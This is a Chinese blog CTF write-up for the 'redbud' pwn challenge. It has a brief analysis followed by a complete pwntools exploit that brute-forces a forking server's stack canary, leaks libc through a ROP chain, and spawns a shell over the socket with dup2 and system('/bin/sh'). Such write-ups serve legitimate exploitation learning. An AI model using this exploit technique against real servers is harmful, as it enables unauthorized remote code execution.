攻防世界PWN之redbud题解

最新推荐文章于 2023-04-23 10:21:32 发布
最新推荐文章于 2023-04-23 10:21:32 发布
阅读量567 收藏 1
点赞数 1
分类专栏: pwn CTF 二进制漏洞 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104356047
版权
pwn 同时被 3 个专栏收录
161 篇文章 26 订阅
订阅专栏
CTF
161 篇文章 11 订阅
订阅专栏
二进制漏洞
161 篇文章 11 订阅
订阅专栏

Redbud

首先,检查一下程序的保护机制

然后,我们用IDA分析一下

在程序的主功能函数里,存在一个明显的栈溢出,由于没有开启PIE,我们很容易做ROP。并且这是一个服务器程序,通过fork子进程来处理我们的请求,因此canary的值我们可以逐字节爆破。因为只要父进程没有重新启动,canary的值就不会变化,这题和cnss那题是一个道理。

那么,我们直接上exp脚本

#coding:utf8
from pwn import *
from LibcSearcher import *

context.log_level = 'critical'
elf = ELF('./redbud')
write_got = elf.got['write']
csu_pop = 0x403F6A
csu_call = 0x403F50
pop_rdi = 0x403F73
#pop rsi;pop r15;ret
pop_rsi = 0x403F71
#socket建立的文件描述符
fd = 4

def init_connection():
   global sh
   #sh = remote('127.0.0.1',1337)
   sh = remote('111.198.29.45',32664)
def stackoverflow(payload):
   sh.send('RPCM')
   sh.send(p32(len(payload) + 12,endian = 'big'))
   sh.send(p32(4,endian = 'big'))
   sh.send(payload)

init_connection()
#爆破canary
canary = ''
while len(canary) < 8:
   for x in range(0xFF):
      init_connection()
      stackoverflow('a'*0x1008 + canary + p8(x))
      try:
         sh.recvuntil('RPCN')
         sh.recv(8)
      except:
         sh.close()
         continue
      canary += p8(x)
      print 'canary=',canary
      break;

canary = u64(canary)
print 'canary=',hex(canary)
rop = p64(csu_pop)
#rbx,rbp
rop += p64(0) + p64(1)
#r12
rop += p64(write_got)
#r13 r14 r15
rop += p64(0x8) + p64(write_got) + p64(fd)
rop += p64(csu_call)
payload = 'a'*0x1008 + p64(canary) + 'a'*0x28 + rop
init_connection()
stackoverflow(payload)
#泄露write函数地址
write_addr = u64(sh.recv(8))
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
dup2_addr = libc_base + libc.dump('dup2')
binsh_addr = libc_base + libc.dump('str_bin_sh')
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
print 'binsh_addr=',hex(binsh_addr)

#getshell
#dup2(fd,0)
rop = p64(pop_rdi) + p64(fd) + p64(pop_rsi) + p64(0) * 2 + p64(dup2_addr)
#dup2(fd,1)
rop += p64(pop_rdi) + p64(fd) + p64(pop_rsi) + p64(1) * 2 + p64(dup2_addr)
#system('/bin/sh')
rop += p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)

payload = 'a'*0x1008 + p64(canary) + 'a'*0x28 + rop
init_connection()
stackoverflow(payload)


sh.interactive()

 

ha1vk
关注
专栏目录
攻防世界pwn题 -- secret file 题解
lifanxin的博客
12-24 952
Write Up知识点关键字样本运行静态分析程序逻辑求解脚本 知识点关键字 栈溢出,popen函数,openssl sha256函数 样本 样本来自攻防世界pwn题 – secret file 运行 查看文件属性   所有保护全开 运行样本程序   本地运行会报一个错误即缺少一个libc动态链接库   该库是openssl开源库,用来实现一些加密算法的,这里给出libcrypto.so.1.1,报错的可以添加到自己本地,使用如下代码在本地/usr/lib下创建一个软链接就行。 ln -s libcrypt
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 559
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
攻防世界PWNpwn11题解
seaaseesa的博客
02-09 712
pwn11 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序会把字符串里的I替换成you,导致strcpy后,s出现栈溢出,直接覆盖到后门函数地址即可 后门函数 综上,我们的exp脚本 #coding:utf8 from pwn import * sh = process('./pwn11') sh = remote('111.198.29.45',31...
pico ctf 2013 php3,PicoCTF_2018_buffer_overflow_3(本地固定canary的爆破)
weixin_31998661的博客
03-23 166
PicoCTF_2018_buffer_overflow_3用IDA分析一下程序,程序从一个固定文件里读取数据,作为canary的值。 由于文件内容不变,所以,我们可以直接爆破。 #coding:utf8from pwn import *shell = ssh(host='node3.buuoj.cn', user='CTFMan', port=27525, password='guest')co...
[XCTF-Reverse] 68 32c3ctf-2015_ey-or
weixin_52640415的博客
03-26 264
艰苦的爆破 运行程序说是一行行输入数据。输入错误就直接退出。程序根本看不明白,按一个个字节暴。 问题在 于这个退出怎么处理。最后用sleep但也有问题,不是总成功。在第1个成功但第2个全部不成功的情况下说明第1个错了,作个回退。 from pwn import * #每行一个字符,成功继续,不成功报错退出 context.log_level = 'critical' #'debug' # ans = [] while True: print(ans) for i in range
PWN综合练习二
WateranFire的博客
10-27 487
合天上的课程笔记 dup2(socket,0)——将socket与标准输入绑定 dup2(socket,1)——将socket与标准输出绑定 realpath(name,&resolved)——将name中的路径转为绝对路径存入resolved 就算realpath调用失败,resolved内还是会填充数据,并且前缀会加上当前路径,构造shellcode时需要注意 有时应该打印出了内容但接
攻防世界PWN之Hungman题解
seaaseesa的博客
02-09 746
Hungman 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 最开始输入名字,根据名字长度申请堆 当我们打赢游戏,更改名字时,可以出现溢出 之前的堆依然还是那个,而我们的输入的内容可以变得更长,导致溢出到下一个堆块,而下一个堆块正式游戏数据的结构体,我们就可以篡改,改成函数的got表地址,再次打赢游戏,就能泄露信息,同理,再来一次,修改got表 而这个游戏是一个...
攻防世界 pwn-100
10-26 325
1 题目 2 分析 如上图,这道题很简单粗暴,直接暴露溢出点,但是需要注意的是,每次输入读200!这点下面会有坑。 思路:利用ROP泄露出read的地址,利用Libsearch获得system和/bin/sh的地址。这些都是常规流程。但是,有一点要注意,在发送payload的时候,一定不能使用sendline或者sendafterline。因为这两个方法会自动在你的payload后面添加\n。本题严格读取200单元,多出来的\n作为下次读取的开头,会导致第二次发送的错误!exp如下 f
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1438
学习pwn开始,慢慢来不要急
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 489
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
攻防世界PWN之bufoverflow_b题解
seaaseesa的博客
02-19 798
bufoverflow_b 这题和bufferoverflow_a类似,只是在输入的时候,增加了一个检查 遇到空字符就会截断,这将不利于我们在chunk里伪造数据。 另外增加了一个功能,不过我没有使用到。 遇到’\x00’就会截断,但是我们仍然可以完整的把我们的伪造数据放进去。 比如,我们要在偏移0x30处写一个数据0x0000000000123456,我们先把0x30处的8字节...
[BUUCTF]PWN——ciscn_2019_final_2
mcmuyanga的博客
03-10 1178
ciscn_2019_final_2 附件 步骤 例行检查,64位程序,保护全开 本地没有flag文件,远程连接一下,经典的堆题的菜单 64位ida载入 init() allocate(),只可以申请0x20或者0x10的chunk delete() show(),show只能调用3次 bye_bye 这道题的关键点在于文件流的知识 dup2 用来复制文件描述符:int dup2 (int oldfd,int newfd) _fileno 是用来规定 fd 所指向的文件流的,i
python: logging日志级别详解
weixin_34279246的博客
08-15 169
import logging ''' 日志级别: critical > error > warning > info > debug,notset 级别越高打印的日志越少,反之亦然,即 debug : 打印全部的日志(notset等同于debug) info : 打印info,warning,error,critical级别的日志 war...
Linux 日志级别(loglevel)详解
10-29 3125
前几天,我在想printk中到底是哪些信息会打印到console上,哪些东西可以通过dmesg来查看。参考了网上一些资料以及自己做的一些实验,总结一下Linux中的console loglevel以及printk, dmesg知识。 只有当printk打印信息时的loglevel小于console loglevel的值(即:优先级高于console loglevel),这些信息才会被打印到c
[BUUCTF-pwn] ciscn_2019_s_7
weixin_52640415的博客
12-20 513
爆破1位 开头有个小冒儿,把输入内容逐位异或i 得到结果应为admin for ( i = 0; ; ++i ) { result = i; if ( i >= a2 ) break; v3 = (_BYTE *)std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>::operator[](a1, i); *v
Canary学习(爆破Canary)
至臻求学,胸怀云月
01-30 4096
one-by-one 爆破Canary原理 对于Canary,虽然每次进程重启后Canary不同,但是同一个进程中的不同线程的Cannary是相同的,并且通过fork函数创建的子进程中的canary也是相同的,因为fork函数会直接拷贝父进程的内存。 最低位为0x00,之后逐次爆破,如果canary爆破不成功,则程序崩溃;爆破成功则程序进行下面的逻辑。由此可判断爆破是否成功。 我们可以利用这样的...
PWN-爆破Canary
weixin_53394081的博客
04-23 946
爆破Canary
浅析栈保护机制
najdhdfh的博客
11-11 3674
栈保护机制 canary canary意为金丝雀,作为栈保护技术之一,它的名字源自于17世纪,英国煤矿工人发现金丝雀对瓦斯十分敏感,每次下井都会带一只金丝雀作为“瓦斯检测指标”,从而挽救了很多工人的生命。 canary机制的原理很简单,就是在函数被调用之后,立即在栈帧中插入一个随机数,函数执行完在返回之前,程序通过检查这个随机数是否改变来判断是否存在栈溢出。如图所示,如果buf数据覆盖了目标地址(红色)处的数据,那canary(黄棕色)处的数据也会改变。 canary机制的绕过 要绕过canary也很简单
通过pwnable.kr从零学pwn
热门推荐
giantbranch的专栏
07-31 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的 挑战地址:http://pwnable.kr/play.php fd 首先不用说给了就直接连上去 看一下代码 重要函数:read ssize_t read(int fd,void *
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值